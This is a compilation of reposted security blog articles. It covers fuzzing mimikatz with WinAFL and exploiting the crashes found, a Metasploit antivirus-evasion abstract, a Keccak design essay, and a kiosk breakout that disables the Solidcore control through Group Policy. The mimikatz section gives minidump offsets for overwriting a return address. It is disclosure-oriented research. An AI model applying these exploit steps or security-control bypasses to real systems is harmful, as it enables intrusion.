First the good things: we already identified 16 unique crashes and a total of 137 unique paths (inputs which result in unique coverage; see the green area). Now the bad: the fuzzing speed is only 13 exec/sec (blue), which is extremely slow for AFL (but much faster than the self-written fuzzer, which had 2 exec/sec per core). And now the really bad part: we have been running for 14,5 hours and haven't yet finished the bitflip 1/1 stage for the first input file (and 136 others are in the queue). You can see this in the red area: we have just finished 97% of this stage. And after that, 2/1 and 4/1 must be executed, then byte flips, arithmetics and so on. So we can see that continuing will not be very efficient. For demonstration I kept the fuzzer running, but modified my WinAppDbg script to filter better and started a new fuzzing job. The new WinAppDbg script reduced the number of "hot bytes" to 3 KB (first we had 27 MB, then we had 91 KB and now we just have 3 KB to fuzz). This was possible because the new script does not count hits from search or copy functions, but does log access attempts to copied memory regions. This WinAppDbg script was approximately 800 LoC (because I have to follow copies which go to heap and stack variables, and I have to disable logging when the variables are freed).

Here is a screenshot of the above job (with the "big" 91 KB input files) after 2 days and 7 hours: We can see that the fuzzer finished bitflip 1/1 and 2/1 and is now inside 4/1 (98% finished). You can also see that the bitflip 1/1 strategy required 737k executions and that 159 of these 737k executions resulted in new coverage (or crashes). Same for 2/1, where the stats are 29/737k. And we found 22 unique crashes in 2 days and 7 hours. And now the fuzzing of the smaller 3 KB files after 2 hours: We can see that we already have 30 unique crashes after 2 hours! (Compare this with only 22 crashes after 2 days and 7 hours with the 91 KB file!)
We can also see that, for example, the bitflip 1/1 stage only required 17.9k executions (instead of 737k) because of the reduced input file size. Moreover, we found 245 unique paths with just 103k total executions (compared to 184 unique paths with 2.17 million executions for the 91 KB test input). And now consider how long it would have taken us to fuzz the full 27 MB file (!!) and what results we would have seen after some days of fuzzing. Now you should understand the importance of the input file size. Here is one more demonstration of the different input file sizes. The following animated image (created via Veles, https://github.com/wapiflapi/veles) shows a visualization of the 27 MB original minidump file: And now the 27 MB minidump file where all unimportant (never read) bytes are replaced with 0x00, so we only see the 3 KB of bytes which we fuzz with WinAFL; you may have to zoom in to see them. Look at the intersection of the 3 coordinate axes.

However, in my opinion even the 3 KB fuzzing job is too slow / inefficient. If we start the job on multiple cores and let it run for one or two weeks, we should get into deeper levels and the result should be OK. But why are we even so slow? Why do we only get an execution speed of 13 or 16 exec/sec? Later queue entries will result in faster execution speeds (like 60 exec/sec), because for those inputs mimikatz does not execute its full code – the inputs trigger error conditions. But on Linux we often deal with execution speeds of several thousand executions per second. A major point is that we have to load and search a 27 MB file on every execution, so reducing this file size could really be a good idea (but requires lots of manual work). On the other hand, we can compare the execution speeds of different setups:

Execution speed with WinAFL in syzygy mode: ~13 exec / sec
Native execution speed without WinAFL and without instrumentation (in-memory): ~335 exec / sec
Execution without WinAFL but with the instrumented (syzygy) binary: ~50 exec / sec
Execution of the native binary (instrumentation via DynamoRio drcov): ~163 exec / sec

So we can see that syzygy instrumentation results in a slowdown factor of approximately 6, and syzygy plus WinAFL in a factor of approximately 25. This is mainly because of the process switches and file writes/reads, since we are not doing full in-memory fuzzing – but there is also another big problem! We can see that instrumentation via DynamoRio is faster than syzygy (163 exec/sec vs. 50 exec/sec), and we can also start WinAFL in DynamoRio mode (which does not require source code at all). If we do this, we get an execution speed of 0,05 – 2 exec/sec with WinAFL. At this point you should recognize that something is not working correctly, because DynamoRio mode should be much faster! The reason can be found in our modification of the kuhl_m_sekurlsa_all() function. I added the two code lines kuhl_m_sekurlsa_reset() and pMinidumpName = argv[1] at the start, because this is exactly what the "sekurlsa::minidump" command does. What I wanted to achieve is to immediately execute the "sekurlsa::minidump" command and after that the "sekurlsa::logonpasswords" command, and that's why I used this sequence of code calls. However, this is a huge problem, because we exit the function (DynamoRio mode) or the __afl_persistent_loop (syzygy mode) in a state where the input file is still open!
This is because we call the kuhl_m_sekurlsa_reset() function at the start of the function and not at the end! That means we only execute one "execution" in-memory; then WinAFL tries to modify the input file, detects that the file is still open and can't be written to, and then terminates the running process (via TerminateProcess from afl-fuzz.c:2186 in syzygy mode, or via nudges in DynamoRio mode from afl-fuzz.c:2195) so it can write to the file. Therefore, we do not do real in-memory fuzzing, because we execute the application once and then the application must be closed and restarted to write the next test case. That's why the DynamoRio mode is so slow: the application must be started again for every testcase, which means it must be instrumented again and again (DynamoRio is a dynamic instrumentation framework). And because syzygy instruments statically, it's not affected as heavily by this flaw (it still has to restart the application, but does not have to instrument it again). Let's fix the problem by moving kuhl_m_sekurlsa_reset() to the end of the function:

    NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[])
    {
        while (__afl_persistent_loop())
        {
            pMinidumpName = argv[1];
            kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages));
            kuhl_m_sekurlsa_reset();
        }
        return STATUS_SUCCESS;
    }

If we execute this, we still face the same problem. The reason is a bug inside mimikatz in the kuhl_m_sekurlsa_reset() function. Mimikatz opens the input file via three calls:

CreateFile
CreateFileMapping
MapViewOfFile

Therefore, we have to close all these three handles/mappings. However, mimikatz fails at closing the CreateFile handle. Here is the important code from kuhl_m_sekurlsa_reset():

    case KULL_M_MEMORY_TYPE_PROCESS_DMP:
        toClose = cLsass.hLsassMem->pHandleProcessDmp->hMinidump;
        break;
    ...
    }
    cLsass.hLsassMem = kull_m_memory_close(cLsass.hLsassMem);
    CloseHandle(toClose);

kull_m_memory_close() correctly closes the file mapping, but the last CloseHandle(toClose) call should close the handle received from CreateFile. However, toClose stores a heap address (from kull_m_minidump_open()):

    *hMinidump = (PKULL_M_MINIDUMP_HANDLE) LocalAlloc(LPTR, sizeof(KULL_M_MINIDUMP_HANDLE));

That means the code calls CloseHandle on a heap address and never calls CloseHandle on the original file handle (which never gets stored). After fixing this issue it starts to work and WinAFL reaches 30-50 exec/sec! However, these executions are very inconsistent and sometimes drop to under 1 execution per second (when the application must be restarted, e.g. after crashes). Because of this, we got better overall fuzzing performance with the syzygy mode (which now has a speed of ~25 exec/sec) and which also uses edge coverage. Screenshot of WinAFL in DynamoRio mode (please bear in mind that with DynamoRio the default mode is basic block coverage and not edge coverage): Screenshot of WinAFL in syzygy mode: Even though DynamoRio mode shows a higher execution speed (29.91 exec/sec vs. 24.02 exec/sec), it is slower in total because the execution speed is inconsistent. We can see this because the DynamoRio mode has been running for 25 minutes and only reached 13.9k total executions, while the syzygy mode has been running for just 13 minutes but already reached 16.6k executions. We can see that it's currently more efficient to fuzz in syzygy mode if source code is available (especially if the target application crashes very often).
And also very important: we had a bug in the code which slowed down the fuzzing process (at least by a factor of 2) and we didn't see it during syzygy fuzzing! (A status screen entry showing in-memory executions vs. application restarts would be a great feature!) Please also note that the WinAFL documentation explicitly mentions this in the "How to select a target function" chapter:

Close the input file. This is important because if the input file is not closed WinAFL won't be able to rewrite it.
Return normally (so that WinAFL can "catch" this return and redirect execution; "returning" via ExitProcess() and such won't work).

The second point is also very important. If an error condition triggers code which calls ExitProcess during fuzzing, we also end up starting the application again and again (and do not get the benefit of in-memory fuzzing). This is no problem with mimikatz. However, mimikatz crashes very often (e.g. 1697 times out of 16600 executions), and with every crash we have to restart the application. This mainly affects the performance of the DynamoRio mode because of the dynamic instrumentation, and then it's better to use the syzygy mode. Please also note that we could "fix" this by storing the stack pointer in the pre-fuzzing handler of DynamoRio and implementing a crash handler which restores the stack and instruction pointer, frees the file mappings and handles, and just continues fuzzing as if nothing had happened. Memory leaks can also be handled by hooking and replacing the heap implementation to free all allocations from the fuzzing loop. Only global variables could become a problem, but this discussion would go too far here. In the end I started a fuzzing job in syzygy mode with one master (deterministic fuzzing) and 7 slaves (non-deterministic fuzzing) and let it run for 3 days (plus one day with page heap). In total I identified ~130 unique AFL crash signatures, which can be reduced to 42 unique WinDbg crash signatures. Most of them are not security-relevant; however, two crashes are critical.

PRACTICE: ANALYSIS OF THE IDENTIFIED CRASHES

Vulnerability 1: Arbitrary partial relative stack overwrites

In this chapter I only want to describe the two critical crashes in depth. After fuzzing I had several unique crashes (based on the call stack of the crash) which I sorted with a simple self-written heuristic. From this list of crashes I took the first one (the one which I thought was the most likely to be exploitable) and analysed it. Here are the exact steps. This is the code with the vulnerability: The variable "myDir" is completely under our control. myDir points into our memory dump, and we can therefore control the full content of this struct. You may want to find the problem yourself before continuing; here are some hints:

The argument length is always 0x40 (64), which is exactly the length of the destination argument buffer
The argument source is also under our full control
Obviously we want to reach RtlCopyMemory() in line 29 with some malicious arguments

Now try to think about how we can exploit this. My thoughts step by step: I want to reach line 29 (RtlCopyMemory()), and therefore the IF statement in lines 9-13 must be true. We can exploit the situation if "lengthToRead" (the size argument) of the RtlCopyMemory call is bigger than 0x40, or if offsetToWrite is bigger than 0x40. The second case would be better for us, because such relative writes are extremely powerful (e.g. just partially overwriting return addresses to bypass ASLR or to skip stack cookies and so on).
So I decided to try exactly this: somehow control "offsetToWrite", which is only set in lines 18 and 23. Line 23 is bad because it sets it to zero, so we take line 18. Since we want to reach line 18, the IF statement in line 15 must evaluate to true.

First condition: Source < memory64->StartOfMemoryRange

This is no problem because we control both values completely. So far, so simple. Now let's check the first IF statement (lines 9-13). One of the three conditions (line 10, 11 or 12) must evaluate to true. Let's focus on line 12: from the IF in line 15 we know that Source < memory64->StartOfMemoryRange must be true, which is exactly what the first check here is for. So this one is true. That means we only have to satisfy the second check:

Second condition: Source + Length > (memory64->StartOfMemoryRange + memory64->DataSize)

I leave this condition aside for a moment and think about lines 25-27. What I want in RtlCopyMemory is to get as much control as possible. That means I want to control the target address (if possible, relative to an address, to deal with ASLR), the source address (pointing into my own buffer) and the size – that would really be great. The size is exactly lengthToRead, and this variable can be set via line 25 or 27. Line 25 would be a bad choice, because Length is fixed and offsetToWrite is already "used" to control the target address. So we must get to line 27. OffsetToRead is always zero because of line 17, and therefore memory64->DataSize completely controls lengthToRead. Now we can fix the next value and say that we want memory64->DataSize to always be 1 (to make 1-byte partial overwrites; or we set it to 4 / 8 to control full addresses). Now we are ready: we take the second condition and fill in the known values. What we get is:

Second condition: Source + 0x40 > (memory64->StartOfMemoryRange + 1)

This check (together with the first condition) is exactly the check which should ensure that DataSize (the number of bytes which we write) stays within the size of the buffer (0x40). However, we can force an integer overflow :). We can just set memory64->StartOfMemoryRange to 0xffffffffffffffff, and therefore we survive the check, because after adding one to it we get zero – and that means Source + 0x40 is always bigger than zero (if we don't overflow Source + 0x40). At the same time we survive the first condition, because Source will be smaller than 0xffffffffffffffff. Now we can also control offsetToWrite via line 18:

offsetToWrite = 0xffffffffffffffff - source

You might think that we can't fully control offsetToWrite because on x86 mimikatz the source variable is just 32-bit (and the 0xffff… value is 64-bit); however, because of integer truncation the upper 32 bits are removed, and therefore we can really address any byte in the address space relative to the destination buffer (on x64 mimikatz it's 64-bit and therefore also no problem). This is an extremely powerful primitive! We can overwrite bytes on the stack via relative offsets (ASLR is no obstacle here), we have full control over the size of the write operation and full control over the values! The code can also be triggered multiple times (the loop at line 7 is not useful because the destination pointer is not incremented) via loops which call this function (with some limitations). The next question is: which offset do we use? Since we write relative to a stack variable, we are going to target a return address.
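Before hunting for the concrete offsets, the wrap-around logic can be double-checked with a few lines of Python (my own model of the two conditions quoted above, not mimikatz code):

    M64 = 2**64

    def survives_checks(source, length, start, data_size):
        in_front = source < start                                          # first condition
        size_check = (source + length) % M64 > (start + data_size) % M64   # second condition, with 64-bit wrap
        return in_front and size_check

    source, length = 0x1000, 0x40
    start, data_size = 0xFFFFFFFFFFFFFFFF, 1
    print(survives_checks(source, length, start, data_size))  # True: the size check is bypassed
    print(hex((start - source) % 2**32))  # offsetToWrite after 32-bit truncation on x86: 0xffffefff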
The destination variable is passed as an argument inside the kull_m_process_ntheaders() function, and this is exactly where we place a breakpoint on the first kull_m_memory_copy() call. Then we can extract the address of the "destination" argument and the address where the return address is stored, and subtract them. What we get is the offset required to overwrite the return address. For reference, here are the offsets which I used for my dump file (dump files from other operating systems will very likely require different offsets):

Offset 0x6B4 stores the "source" variable. I use 0xffffff9c here, because this is exactly the correct offset from "destination" to "return address" in the current release version of mimikatz (mimikatz 2.1.1 from Aug 13 2017; however, this offset should also work for older versions!).

Offset 0xF0 stores the "myDir" struct content. The first 8 bytes store the NumberOfMemoryRanges (this controls the number of loops and therefore how often we can write). Since we just want to demonstrate the vulnerability, we set it to one to make exactly one write operation (overwriting the return address). The next 8 bytes are the BaseRVA. This value controls "ptr" in line 6, which is the source from where we copy data. So we have to store there the relative offset in our dump file at which we place the new return address (which should overwrite the original one). I'm using the value 0x90 here, but we can use any value. It's only important that we then store the new return address at that offset (in my case offset 0x90). I therefore wrote 0x41414141 to offset 0x90. The next 8 bytes control the "StartOfMemoryRange" variable. I originally used 0xffffffffffffffff (like in the above example); however, for demonstration purposes I wanted to overwrite 4 bytes of the return address (and not only 1) and therefore had to subtract 4 (the DataSize, check the second condition in line 12). The next 8 bytes control the "DataSize", and as already explained I set this to 4 to write 4 bytes. Here is the file:

Hint: In the above figure the malicious bytes start at offset 0xF0. This offset can differ in your minidump file. If we check the byte at 0x0C (= 0x20), we can see that this is the offset to the "streams" directory. Therefore, the above minidump has a streams directory starting at offset 0x20. Every entry there consists of 3 DWORDs (on x86); the first is the type and the last is the offset. We search for the entry with type 0x09 (= Memory64ListStream). This can be found in our figure at offset 0x50. If we take the 3rd DWORD from there, we can see that this is exactly 0xF0 – the offset where our malicious bytes start. If this offset is different in your minidump file, you may want to patch it first. And here is the proof that we really have control over the return address:

Please note that full exploitation is still tricky, because we have to find a way around ASLR. Because of DEP our data is marked as not executable, therefore we can't jump into shellcode. The default bypass technique is to apply ROP, which means that we instead invoke already existing code. However, because of ASLR this code is always loaded at randomized addresses. Here is what we can do with the above vulnerability: We can make a relative write on the stack, which means we can overwrite the return address (or arguments or local variables like loop counters or destination pointers). Because of the relative write we can bypass stack ASLR. Next, we can choose the size of the write operation, which means we can make a partial overwrite.
We can therefore overwrite only the two lower bytes of the return address, which means we can bypass module-level ASLR (these two properties make the vulnerability so useful). We can check the ranges which we can reach by examining the call stack to the vulnerable code (every return address on this stack trace can be targeted via a partial overwrite), and we have multiple paths to reach the vulnerable code (and therefore different call stacks with different ranges; we can even create more call stacks by overwriting a return address with an address which creates another call stack to the vulnerable code). For example, a simple exploit could be to overwrite one of the return addresses with the address of code which calls LoadLibraryA() (e.g. 0x455DF3, which is in range) or LoadLibraryW (e.g. 0x442145). The address must be chosen in a way that the function argument is a pointer to the stack, because then we can use the vulnerability to write the target path (a UNC path to a malicious library) to this address on the stack. Next, this exploit could be extended to first call kull_m_file_writeData() to write a library to the file system, which later gets loaded via LoadLibrary (this way UNC paths are not required for exploitation). Another idea would be to make a specific write which exchanges the destination and source arguments of the vulnerable code. Then the first write operations can be used to write the upper bytes of return addresses (which are randomized by ASLR) to the memory dump buffer. After that, these bytes can be written back to the stack (with the vulnerability) and full ROP chains can be built, because we can now write ROP gadget addresses one after the other. Without this idea we cannot execute multiple ROP gadgets in sequence, because they are not stored adjacently on the stack (return addresses are not stored next to each other on the stack; there is other data in between, like arguments, local variables and so on). However, I believe that this exploitation scenario is much more difficult, because it requires multiple writes (which must be ordered so that they survive all checks in the mimikatz code), so the first approach with LoadLibrary should be simpler to implement.

Vulnerability 2: Heap overflow

The major cause of the second vulnerability can be found inside kull_m_process_getUnicodeString(). The first parameter (string) is a structure with the fields buffer (data pointer), a maximum length (the maximum number of bytes the string can hold) and the length (the currently stored characters). The content is completely under attacker control, because it is parsed from the minidump. Moreover, the source (the second argument) also points into the minidump (attacker controlled). Mimikatz always extracts the string structure from the minidump and after that calls kull_m_process_getUnicodeString() to fill string->buffer with the real string from the minidump. Can you spot the problem? Line 9 allocates space for string->MaximumLength bytes, and after that it copies exactly the same number of bytes from the minidump to the heap (line 11). However, the code never checks string->Length, and therefore string->Length can be bigger than string->MaximumLength, because this value is retrieved from the minidump. If later code uses string->Length, a heap overflow can occur. This is for example the case when MSV1.0 (dpapi) credentials are stored in the minidump.
Then mimikatz uses the string as input (and output) inside the decryption function kuhl_m_sekurlsa_nt6_LsaEncryptMemory(), and the manipulated length value leads to a heap overflow (however, the MSV1.0 execution path is not trivial – if at all possible – to exploit in my opinion, but there are many other paths which use kull_m_process_getUnicodeString()).

Vulnerabilities patch status

At the time of publication (2017-09-22) there is no fix available for mimikatz. I informed the author about the problems on 2017-08-26 and received a very friendly answer on 2017-08-28, saying that he will fix the flaws if it does not expand the code base too much. He also pointed out that mimikatz was developed as a proof-of-concept and that it could be made more secure by using a higher-level language, which I totally agree with. On 2017-08-28 I sent the SMIME-encrypted vulnerability details (together with this blog post). Since I didn't receive answers to further emails or Twitter messages, I informed him on 2017-09-06 about the blog post release on 2017-09-21. If you are a security consultant and use mimikatz in minidump mode, make sure to only use it inside a dedicated mimikatz virtual machine which is not connected to the internet/intranet and does not store important information (I hope you are already doing this anyway). To further mitigate the risk (e.g. a VM escape) I recommend fixing the above-mentioned vulnerabilities.

THEORY: RECOMMENDED FUZZING WORKFLOW

In this last chapter, I want to quickly summarize the fuzzing workflow which I recommend:

1. Download as many input files as possible.
2. Calculate a minset of input files which still triggers the full code/edge coverage (corpus distillation). Use a Bloom filter for fast detection of different coverage.
3. Minimize the file size of all input files in the minset.
4. For the generated minset, calculate the code coverage (no Bloom filter).
5. Now we can statically add breakpoints (byte 0xCC) at all basic blocks which were not hit yet. This modified application can be started with all files from the input set and should not crash. However, we can continue downloading more files from the internet and start the modified binary with them (or just fuzz it). As soon as the application crashes (and our configured just-in-time debugger script kicks in), we know that a new code path was taken. Using this approach, we can achieve native execution speed but still extract the information about new coverage! (Downside: checksums inside files break; moreover, a fork-server should also be used.)
6. During fuzzing I recommend extracting edge coverage (which requires instrumentation), and therefore we should fuzz with instrumentation (and sanitizers / heap libraries).
7. For every input, we conduct an analysis phase before fuzzing. This analysis phase does the following: First, identify the common code which gets executed for most inputs (for this we had to log the code coverage without the Bloom filter). Then get the code coverage for the current input and subtract the common code coverage from it. What we get is the code coverage which makes this fuzzing input "important" (code which only gets executed for this input). Next, we start our heatmap analysis, but we only log the read operations conducted by this "important" code! What we get from this are the bytes which make our input "important". Now we don't have to fuzz the full input file, nor do we have to fuzz all bytes which are read by the application; instead we only have to fuzz the few bytes which make the file "special"!
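As a toy illustration of the coverage subtraction in the analysis phase (my own sketch; coverage is represented as plain Python sets of edge IDs, whereas a real implementation would use the Bloom filter mentioned above):

    coverage = {                      # per-input edge coverage (toy data)
        "a.dmp":   {1, 2, 3, 4},
        "b.dmp":   {1, 2, 3, 5},
        "new.dmp": {1, 2, 3, 6, 7},   # the freshly found queue entry
    }
    common = set.intersection(*coverage.values())   # code almost every input executes
    special_code = coverage["new.dmp"] - common     # edges that make this input "important"
    print(special_code)                             # {6, 7}
    # the heatmap pass is then restricted to reads performed by these edges,
    # which yields the few "special" bytes to fuzz first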
I recommend focusing on these "special" bytes first, but also fuzzing the other bytes afterwards (fuzzing the special bytes fuzzes the new code; fuzzing all bytes fuzzes the old code with the new state resulting from the new code). Moreover, we can add additional slow checks which must be done only once per new input (e.g. log all heap allocations and check for dangling pointers after a free operation; a similar concept to Edge's MemGC). Of course, additional feedback mechanisms and symbolic execution can be added on top. Want to learn more about fuzzing? Come to one of my fuzzing talks (heise devSec or IT-SECX for fuzzing applications with source code available, and DefCamp for fuzzing closed-source applications!) or just follow me on Twitter. Sursa: https://www.sec-consult.com/en/blog/2017/09/hack-the-hacker-fuzzing-mimikatz-on-windows-with-winafl-heatmaps-0day/index.html
-
- 2
-
-
Metasploit Low Level View
Saad Talaat (saadtalaat@gmail.com) @Sa3dtalaat
Abstract: For the past (almost) decade, Metasploit has been the number one pentesting tool. A lot of plug-ins have been developed specifically for it. However, the key point of this paper is to discuss the Metasploit framework as a code injector and payload encoder. Another key point of this paper is the different forms of malware and how to evade anti-virus software, which has lately been a pain for pentesters – and how exactly anti-malware software works. Download: https://www.exploit-db.com/docs/18532.pdf
-
- 1
-
-
Why Keccak is not ARX

If SHA-2 is not broken, why would one switch to SHA-3 and not just stay with SHA-2? There are several arguments why Keccak/SHA-3 is a better choice than SHA-2. In this post, we come back on a particular design choice of Keccak and explain why Keccak is not ARX, unlike SHA-2.

We specified Keccak at the bit level using only transpositions, bit-level additions and multiplications (in GF(2)). We arranged these operations to allow efficient software implementations using fixed sequences of bitwise Boolean instructions and (cyclic) shifts. In contrast, many designers specify their primitives directly in pseudocode similarly including bitwise Boolean instructions and (cyclic) shifts, but on top of that also additions. These additions are modulo 2^n, with n a popular CPU word length such as 8, 32 or 64. Such primitives are dubbed ARX, which stands for "addition, rotation and exclusive-or (XOR)". The ARX approach is widespread and adopted by the popular designs MD4, MD5, SHA-1, SHA-2, Salsa, ChaCha, Blake(2) and Skein. So why isn't Keccak following the ARX road? We give some arguments in the following paragraphs.

ARX is fast! It is! Is it?

One of the main selling points of ARX is its efficiency in software: addition, rotation and XOR usually take only a single CPU cycle. For addition, this is not trivial, because the carry bits may need to propagate from the least to the most significant bit of a word. Processor vendors have gone through huge efforts to make additions fast, and ARX primitives take advantage of this in a smart way. When trying to speed up ARX primitives by using dedicated hardware, not so much can be gained, unlike with bit-oriented primitives such as Keccak. Furthermore, the designer of an adder must choose between complexity (area, consumption) and gate delay (latency): it is either compact or fast, but not both at the same time. A bitwise Boolean XOR (or AND, OR, NOT) does not have this trade-off: it simply takes a single XOR per bit and has a gate delay of a single binary XOR (or AND, OR, NOT) circuit. So the inherent computational cost of additions is a factor 3 to 5 higher than that of bitwise Boolean operations. But even software ARX gets into trouble when protection against power or electromagnetic analysis is a threat. Effective protection at the primitive level requires masking, namely, where each sensitive variable is represented as the sum of two (or more) shares and where the operations are performed on the shares separately. For bitwise Boolean operations and (cyclic) shifts, this sum must be understood bitwise (XOR), and for addition the sum must be modulo 2^n. The trouble is that ARX primitives require many computationally intensive conversions between the two types of masking.

ARX is secure! It is! Is it?

The cryptographic strength of ARX comes from the fact that addition is not associative with rotation or XOR. However, it is very hard to estimate the security of such primitives. We give some examples to illustrate this. For MD5, it took almost 15 years to be broken, while the collision attacks that were finally found can be mounted almost by hand. For SHA-1, it took 10 years to convert the theoretical attacks of around 2006 into a real collision. More recently, at the FSE 2017 conference in Tokyo, some attacks on Salsa and ChaCha were presented which in retrospect look trivial but remained undiscovered for many years.
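The interaction quoted above ("addition is not associative with rotation or XOR") is easy to see experimentally; a short Python check (our illustration, not from the Keccak team's post) shows that rotation distributes over XOR but not over addition modulo 2^32:

    MASK = 0xFFFFFFFF

    def rol(x, r):                    # 32-bit left rotation
        return ((x << r) | (x >> (32 - r))) & MASK

    a, b, r = 0x12345678, 0x9ABCDEF0, 7
    print(rol(a ^ b, r) == (rol(a, r) ^ rol(b, r)))   # True: rotation is linear over XOR
    c = d = 0x80000001                # values whose carry crosses the rotation boundary
    print(hex(rol((c + d) & MASK, r)))                # 0x100
    print(hex((rol(c, r) + rol(d, r)) & MASK))        # 0x180 - not the same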
Nowadays, when a new cryptographic primitive is published, one expects arguments on why it would provide resistance against differential and linear cryptanalysis. Evaluating this resistance implies investigating propagation of difference patterns and linear masks through the round function. In ARX designs, the mere description of such difference propagation is complicated, and the study of linear mask propagation has only barely started, more than 25 years after the publication of MD5. A probable reason for this is that (crypt)analyzing ARX, despite its merits, is relatively unrewarding in terms of scientific publications: It does not lend itself to a clean mathematical description and usually amounts to hard and ad-hoc programming work. A substantial part of the cryptographic community is therefore reluctant to spend their time trying to cryptanalyze ARX designs. We feel that the cryptanalysis of more structured designs such as Rijndael/AES or Keccak/SHA-3 leads to publications that provide more insight. ARX is serious! It is! Is it? But if ARX is really so bad, why are there so many primitives from prominent cryptographers using it? Actually, the most recent hash function in Ronald L. Rivest's MD series, the SHA-3 candidate MD6, made use of only bitwise Boolean instructions and shifts. More recently, a large team including Salsa and ChaCha designer Daniel J. Bernstein published the non-ARX permutation Gimli. Gimli in turn refers to NORX for its design approach, a CAESAR candidate proposed by a team including Jean-Philippe Aumasson and whose name stems from a rather explicit “NO(T A)RX”. Actually, they are moving in the direction where Keccak and its predecessors (e.g., RadioGatún, Noekeon, BaseKing) always were. So, maybe better skip ARX? Sursa: https://keccak.team/2017/not_arx.html
-
Breaking out of Restricted Windows Environment
ON JUNE 14, 2017 BY WEIRDGIRL

Many organizations these days use restricted Windows environments to reduce their attack surface. The more the system is hardened, the less functionality is exposed. I recently ran across such a scenario, where an already hardened system was protected by McAfee Solidcore. Solidcore was preventing users from making any changes to the system like installing/uninstalling software, running executables, launching applications etc. The system (Windows 7) which I was testing boots right into the application login screen while restricting access to other OS functionality. I could not do anything with that system except for restarting it. I spent a whole week gathering information about the application and the system, which included social engineering as well. And then I got an entry point to start with. The credentials to log in to the application (which gave me a headache for one week) were available on the Internet (thanks to a Google dork). The credentials I got were admin credentials.

After logging in to the application there was no way to get out of it and into the base system. The application was so well designed that there was not a single way out of it. Then I found an option in the application to print some document. Then clicked on print-->printer settings-->add a printer-->location-->browse location and I got access to the file browser of the host machine. Every Windows file explorer has a Windows help option which provides free help about Windows features. It was possible to open a command prompt from the help option. I was only able to open the command prompt but not any other Windows application. Even after getting access to the command prompt I was unable to make any changes to the system (not even open notepad). Every Windows application that I tried to open ended up with the following error message:

The error made it very clear that the application is blocked and that it can be enabled either from the registry editor or from the group policy editor. However I did not have access to either of them; Solidcore was blocking access to both. So I used a batch script to enable Task Manager (reconstructed below). The script modified the relevant registry key (though I didn't have any idea whether it was actually blocked from the registry editor or from the group policy editor). And to my surprise I was able to unlock Task Manager. Similarly I was able to unlock and open the Control Panel. My main objective was to disable or uninstall Solidcore, as it was restricting the desktop environment. But then the system kept on giving me challenges. I was able to uninstall any software except for Solidcore. Then there was only one way left to disable Solidcore / enable installation of other software, and that was the Group Policy Editor. However I didn't have direct access to gpedit. I used the following way to get access to gpedit:

Open Task Manager-->File-->New task-->Type MMC and press enter
This opened the Microsoft Management Console
In mmc: File-->Add/Remove snap-in-->Select Group Policy Objects and click on add

After this I was able to perform numerous actions like enabling blocked system applications, allowing access to the Desktop, disabling Windows restrictions etc. However my main objective was to disable Solidcore and find a way to run any Windows executable. The Group Policy editor provides an option to run/block only allowed Windows software.
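The batch script itself was an image in the original post and did not survive in this copy. Enabling Task Manager from a script is classically done by clearing the well-known DisableTaskMgr policy value, so the script presumably contained something along these lines (a reconstruction, not the author's exact code):

    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f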
That "run only allowed applications" policy can be set in the following way:

Group Policy editor-->User Configuration > Administrative Templates > System

On the right side there's the option "Do not run specified Windows applications". Click on that: Edit-->Select Enabled-->Click on show list of disallowed applications-->then add the application name that you want to block (in my case it was Solidcore). Then click "Ok". To apply the changes I restarted my system. In the same way it was possible to enable a list of allowed applications that can run in Windows (malicious software as well). And that's how I was able to break out of a completely restricted desktop environment. Sursa: https://weirdgirlweb.wordpress.com/2017/06/14/first-blog-post/
-
- 2
-
-